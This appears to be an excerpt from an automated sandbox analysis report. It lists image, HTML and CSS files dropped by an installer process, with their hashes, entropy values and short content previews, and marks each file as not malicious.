                                                                                                                                                                                                                                                          File Type:PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):20030
                                                                                                                                                                                                                                                          Entropy (8bit):7.985863672702684
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:KJXE050lAI9uOflF5XFBw+q7hYwPXsUoRGf0wp4vF:K350f95fl1uD7/XuC4vF
                                                                                                                                                                                                                                                          MD5:E01B942B6936DF2AF64EE809086A5334
                                                                                                                                                                                                                                                          SHA1:6601FE8901F8F131CF47352896B01C8DCFD4C963
                                                                                                                                                                                                                                                          SHA-256:E5FEAB5FF923032A51C09F3D61DB2C4AE052CEA6691F034F397207EACC3C2283
                                                                                                                                                                                                                                                          SHA-512:8B21E8B99218F8A0646A418BF3B184A7F8BA1A8061A60383E1EF0BECF85CD07DD68478AD8225A17ED1458DCCC49585B77FF77407F016D95FE57FAD3E8C305BE9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...Z...6.......au....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):6513
                                                                                                                                                                                                                                                          Entropy (8bit):7.938370771306964
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:LSDZ/I09Da01l+gmkyTt6Hk8nTQ27DriW08tOW633IfYjzfxKoKg49BM+Uf9C4jc:LSDS0tKg9E05TQ2jX08MQgHx6Sxm3Cg7
                                                                                                                                                                                                                                                          MD5:538614FCC5E9A342D74CFB01246E3755
                                                                                                                                                                                                                                                          SHA1:3496DD97D840823F928213E7E69BB8386EA057DC
                                                                                                                                                                                                                                                          SHA-256:3524B51003AC153E7A40775C3955AA8E3F60AE99F99E514DB60A4BED628C16BC
                                                                                                                                                                                                                                                          SHA-512:A2689D78B11B7C48BABAD5FC97672F6173DFF0DF3C082F6403581FFA45AE7E123BAA93B46DC3495CAD42328959E0EEBA68C70F35E371D175A5E406A9BAFED576
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...:...<.....@.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):29784
                                                                                                                                                                                                                                                          Entropy (8bit):7.980725536896858
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:RJXE05H3FyEuuqIMky+JU2JzDvj4Ygzc+Cv23bS5PdnFKo79yBbKafVLgkjPSTjG:z35I4qWNJVzAYkl3G51odZfmjymQ7l
                                                                                                                                                                                                                                                          MD5:4C0A6A977EB10BA6ACB252E1C29141F7
                                                                                                                                                                                                                                                          SHA1:3F5E32E79A7D3DB63C8D0BFF06CE43DF0EC6092F
                                                                                                                                                                                                                                                          SHA-256:91853EDF8E536457D93044FCAA5412807368B6B6C88366E05738F3C8A4D031BC
                                                                                                                                                                                                                                                          SHA-512:6C016AABA1B638EC8B2D22CE0AC4B23F662F9D2A372CA016ED5CFDDD72FAAD1A876600E78EEAB27DDE1FAAB47A43AE7CE805B33C43218240BAAC006DA74E569B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...z...'......9g.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5873
                                                                                                                                                                                                                                                          Entropy (8bit):7.9422746739510455
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:LSDZ/I09Da01l+gmkyTt6Hk8nTbCCivsM0hVEz9EEWJcLWmu9H3s5cVQOVplQG:LSDS0tKg9E05TdMiEz9IJcVOVQG
                                                                                                                                                                                                                                                          MD5:08696DFA1637279FCD315A0D2B13EA6E
                                                                                                                                                                                                                                                          SHA1:9579D2CC5852F05288E2205F060F6C18F5619C39
                                                                                                                                                                                                                                                          SHA-256:7C9CBFC634C58F761DFE138DD770C533B5DDDCF222FDE0B3BACFBB76F9A4CD9F
                                                                                                                                                                                                                                                          SHA-512:F38BDF328BE3A4D7003A9216BDF2A9FAD1E53B130DAE37CA2BFC2CA36A497392A03950B137A1363AA25523068A38C87D6B19D5EFFAF0D5E421CE346140B9B444
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...:...<.....@.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5798
                                                                                                                                                                                                                                                          Entropy (8bit):7.935696994639288
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:LSDZ/I09Da01l+gmkyTt6Hk8nT4+KjhO/UW3j12FlHdjuxgXZLqKhiz:LSDS0tKg9E05TEjE8aoxdqqXZdEz
                                                                                                                                                                                                                                                          MD5:5503FA64C9D05F3025834D93A81AF764
                                                                                                                                                                                                                                                          SHA1:CD2ABB0DD317BAAB5ED12488B7EF0EB76795F95D
                                                                                                                                                                                                                                                          SHA-256:F4EE63F12CE2753CF71A160F5D7772E998CF5B6DBD4BB27502AE43789D9DA822
                                                                                                                                                                                                                                                          SHA-512:AB205307CEA14D14FA7CCE024244FCF5AAE6DA6F7825058A3061CB88DCDE2579DBB6670516559792B631B2A39E756BF4E81ED63C16C205AFDEFCFCBD42F07245
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...:...<.....@.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):29784
                                                                                                                                                                                                                                                          Entropy (8bit):7.980725536896858
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:RJXE05H3FyEuuqIMky+JU2JzDvj4Ygzc+Cv23bS5PdnFKo79yBbKafVLgkjPSTjG:z35I4qWNJVzAYkl3G51odZfmjymQ7l
                                                                                                                                                                                                                                                          MD5:4C0A6A977EB10BA6ACB252E1C29141F7
                                                                                                                                                                                                                                                          SHA1:3F5E32E79A7D3DB63C8D0BFF06CE43DF0EC6092F
                                                                                                                                                                                                                                                          SHA-256:91853EDF8E536457D93044FCAA5412807368B6B6C88366E05738F3C8A4D031BC
                                                                                                                                                                                                                                                          SHA-512:6C016AABA1B638EC8B2D22CE0AC4B23F662F9D2A372CA016ED5CFDDD72FAAD1A876600E78EEAB27DDE1FAAB47A43AE7CE805B33C43218240BAAC006DA74E569B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...z...'......9g.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):12965
                                                                                                                                                                                                                                                          Entropy (8bit):4.7252821159716
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:fosFgDIOR12U81EfXbWtk4VAwvZRlppVLMQ:fos4II2U81EfLWtk4VAwvNpUQ
                                                                                                                                                                                                                                                          MD5:5EC6E79E4BA242B21EBD31F4EF89BEB8
                                                                                                                                                                                                                                                          SHA1:7D0202CC4739CFA0C8459E9347260F8F44DD72BF
                                                                                                                                                                                                                                                          SHA-256:1B7D810D6F1338C3D06A01E067E0F933319048A03CCA73DBEA955400216448A3
                                                                                                                                                                                                                                                          SHA-512:A4426BE8C9850D699EB3674B5A6C78E0E7666DB8BCC44D89FBA7D8D3158DE4E55548628318D13B35D7F8333C3237F1971750F46897448538F8AC7EDD4EFA985B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">..<link rel="stylesheet" type="text/css" href="mSpy/widgets.css" media="all">..<link rel="stylesheet" type="text/css" href="mSpy/jquery-ui-1.css" media="all">..<link rel="stylesheet" type="text/css" href="mSpy/reset.css" media="all">..<link rel="stylesheet" type="text/css" href="mSpy/main.css" media="all">..<link rel="stylesheet" type="text/css" href="mSpy/anythingslider.css" media="all">..<link rel="stylesheet" type="text/css" href="mSpy/jquery.css" media="all">..<link rel="stylesheet" type="text/css" href="mSpy/core-ui-select.css" media="all">..<link rel="stylesheet" type="text/css" href="mSpy/jquery_002.css" media="all">..</head>..<body>.. <div class="std"><div class="wrapper">.. <div class="contentZone buyNowSection">.. <div class="product_page_wrap">.. <div class="product_page_top">..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9084
                                                                                                                                                                                                                                                          Entropy (8bit):5.065593140327065
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:hHkh1vcghAgzaYToWEaRuBMYzwd8Hj5YuMe2Ec:qjkqAgZVSwdYw
                                                                                                                                                                                                                                                          MD5:5F2BED4A85218C1C9C056201259D9477
                                                                                                                                                                                                                                                          SHA1:352547773546BB1D33CB0C2384F7BD97B158C7C7
                                                                                                                                                                                                                                                          SHA-256:FC4B85956CF6A007BEF8A531757A85F15C65937C717D6294B78D24688F36FF0F
                                                                                                                                                                                                                                                          SHA-512:2D9E9A2B2B305B9178179D2A69322EABE394287F1C31A2D40B930C5A249433B1C646118D6EC67495926FE138306291A9C29F4F35004F18D9D5E1FB6267A20405
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:/*..AnythingSlider v1.8+ Default theme..By Chris Coyier: http://css-tricks.com..with major improvements by Doug Neiner: http://pixelgraphics.us/..based on work by Remy Sharp: http://jqueryfordesigners.com/.*/../*****************************. SET DEFAULT DIMENSIONS HERE. *****************************/./* change the ID & dimensions to match your slider */.#main_slider { ..width: 992px; ..height: 352px;..list-style: none;../* Prevent FOUC (see FAQ page) and keep things readable if javascript is disabled */..overflow-y: auto;..overflow-x: hidden;.}../*.caption{..filter:alpha(opacity=0);..-moz-opacity: 0;..opacity: 0;.}*/../******************. SET STYLING HERE. ******************. =================================. Default state (no keyboard focus). ==================================*/./* Overall Wrapper */..anythingSlider-default {..margin: 0 auto;../* 45px right & left padding for the arrows, 28px @ bottom for navigation */..padding:0;.}./* slider window - top & bottom borders, default
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 52 x 44, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5834
                                                                                                                                                                                                                                                          Entropy (8bit):7.9212427160575425
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:PSDZ/I09Da01l+gmkyTt6Hk8nTNNtt/qXgfUmbtKXla2oVvcdWYrIgvPUSxMl:PSDS0tKg9E05TNNtlfUmIXlaZVvcdzIr
                                                                                                                                                                                                                                                          MD5:F3E723BB70B07629C0A18763CD74EBE3
                                                                                                                                                                                                                                                          SHA1:0450CC4E9FEC6C3FD446E2B3D3E68D03D37933A8
                                                                                                                                                                                                                                                          SHA-256:1216AF29845B020BD410C9A4B0B2B0C6B2D528D5C6DDDA7BBDA0A905B4DDC84D
                                                                                                                                                                                                                                                          SHA-512:0E9B25744201D9C3DFE27BE2497A2B6B769846A77E3CEADAB0A6B916B0F342A8EFC13A0817036883D36E7461276004D3B57CE648B9C4C771656CE6FE8B9FB071
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...4...,.....].......pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4266
                                                                                                                                                                                                                                                          Entropy (8bit):4.888037026868242
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:FL8hjXF4ZFQF9FN/bIbx/yG2aC98ZehV9KF5Kf5k8gItrGZWFXyLYPBYzzDGt50s:F4xCKHT/bIbty19ee79KF5K68gI/yLsT
                                                                                                                                                                                                                                                          MD5:94AED20EA3D620951F905B410B0058B2
                                                                                                                                                                                                                                                          SHA1:0D4EA80D39F277A92FD4946CFB60EDFDEC72FADD
                                                                                                                                                                                                                                                          SHA-256:4A2DE64E3701F68BE8FE448B569E3E2D36E54EA4AC59C25C91209F657ADD6C89
                                                                                                                                                                                                                                                          SHA-512:FC5C107B7275A54966CC575EFAB496BF8D1BC3048D4ACD8916A62E0FE8B29AEDB4C44DE4513645CD4837ED58EBDF337BC3C9768E427B2DB3CF5D86CE07050649
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.b-core-ui-select { . margin:10px 0 0 0;. position: relative;. width: 86%;. padding: 6px 10px 6px 12px;. font-size: 12px;. line-height: 18px;. color: #333;. text-shadow: 0 1px 1px rgba(255, 255, 255, 0.75);. cursor: pointer;. background-color: #f3f3f3;. background-image: -ms-linear-gradient(top, #f3f3f3, #fff);. background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#f3f3f3), to(#fff));. background-image: -webkit-linear-gradient(top, #f3f3f3, #fff);. background-image: -o-linear-gradient(top, #f3f3f3, #fff);. background-image: linear-gradient(top, #f3f3f3, #fff);. background-image: -moz-linear-gradient(top, #f3f3f3, #fff);. background-repeat: repeat-x;. border: 1px solid #f1f1f1;. border-radius: 16px;. -webkit-box-shadow:inset 2px 2px 2px 0px rgba(0, 0, 0, 0.4);. box-shadow:inset 2px 2px 2px 0px rgba(0, 0, 0, 0.4);. -webkit-user-select: none;. -moz-user-select: none;. -ms-user-select: none;. -o-user-select:
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):20030
                                                                                                                                                                                                                                                          Entropy (8bit):7.985863672702684
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:KJXE050lAI9uOflF5XFBw+q7hYwPXsUoRGf0wp4vF:K350f95fl1uD7/XuC4vF
                                                                                                                                                                                                                                                          MD5:E01B942B6936DF2AF64EE809086A5334
                                                                                                                                                                                                                                                          SHA1:6601FE8901F8F131CF47352896B01C8DCFD4C963
                                                                                                                                                                                                                                                          SHA-256:E5FEAB5FF923032A51C09F3D61DB2C4AE052CEA6691F034F397207EACC3C2283
                                                                                                                                                                                                                                                          SHA-512:8B21E8B99218F8A0646A418BF3B184A7F8BA1A8061A60383E1EF0BECF85CD07DD68478AD8225A17ED1458DCCC49585B77FF77407F016D95FE57FAD3E8C305BE9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...Z...6.......au....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9410
                                                                                                                                                                                                                                                          Entropy (8bit):4.808156480467523
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:8xTTXb1y2qsr2WlPFGU6NQ78CodleKl5DJ:8Rysr2UgnXeKl59
                                                                                                                                                                                                                                                          MD5:8FE70C8D484CF5852239704F1A614273
                                                                                                                                                                                                                                                          SHA1:F13788A7DDCD3EA44A34779803CC8D27EC5C3C13
                                                                                                                                                                                                                                                          SHA-256:6D46AD7400BA5FE7CADB930AEDAF0A8FEAD8609A5E26DCD48B274E6AC146DD94
                                                                                                                                                                                                                                                          SHA-512:754CCE55105E01CD9668E2570212140022BB52FDC0FD02C60C34C8B691BC45D7B2187FCBA95FB9FC196D6F438154A22DAD4AFC044A3A1FC80024725AFA3066A6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:./*! normalize.css v1.0.1 | MIT License | git.io/normalize */../* ==========================================================================. HTML5 display definitions. ========================================================================== */../*. * Corrects `block` display not defined in IE 6/7/8/9 and Firefox 3.. */..article,.aside,.details,.figcaption,.figure,.footer,.header,.hgroup,.nav,.section,.summary {. display: block;.}../*. * Corrects `inline-block` display not defined in IE 6/7/8/9 and Firefox 3.. */..audio,.canvas,.video {. display: inline-block;. *display: inline;. *zoom: 1;.}../*. * Prevents modern browsers from displaying `audio` without controls.. * Remove excess height in iOS 5 devices.. */..audio:not([controls]) {. display: none;. height: 0;.}../*. * Addresses styling for `hidden` attribute not present in IE 7/8/9, Firefox 3,. * and Safari 4.. * Known issue: no IE 6 support.. */..[hidden] {. display: none;.}../* ===========================
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9084
                                                                                                                                                                                                                                                          Entropy (8bit):5.065593140327065
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:hHkh1vcghAgzaYToWEaRuBMYzwd8Hj5YuMe2Ec:qjkqAgZVSwdYw
                                                                                                                                                                                                                                                          MD5:5F2BED4A85218C1C9C056201259D9477
                                                                                                                                                                                                                                                          SHA1:352547773546BB1D33CB0C2384F7BD97B158C7C7
                                                                                                                                                                                                                                                          SHA-256:FC4B85956CF6A007BEF8A531757A85F15C65937C717D6294B78D24688F36FF0F
                                                                                                                                                                                                                                                          SHA-512:2D9E9A2B2B305B9178179D2A69322EABE394287F1C31A2D40B930C5A249433B1C646118D6EC67495926FE138306291A9C29F4F35004F18D9D5E1FB6267A20405
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
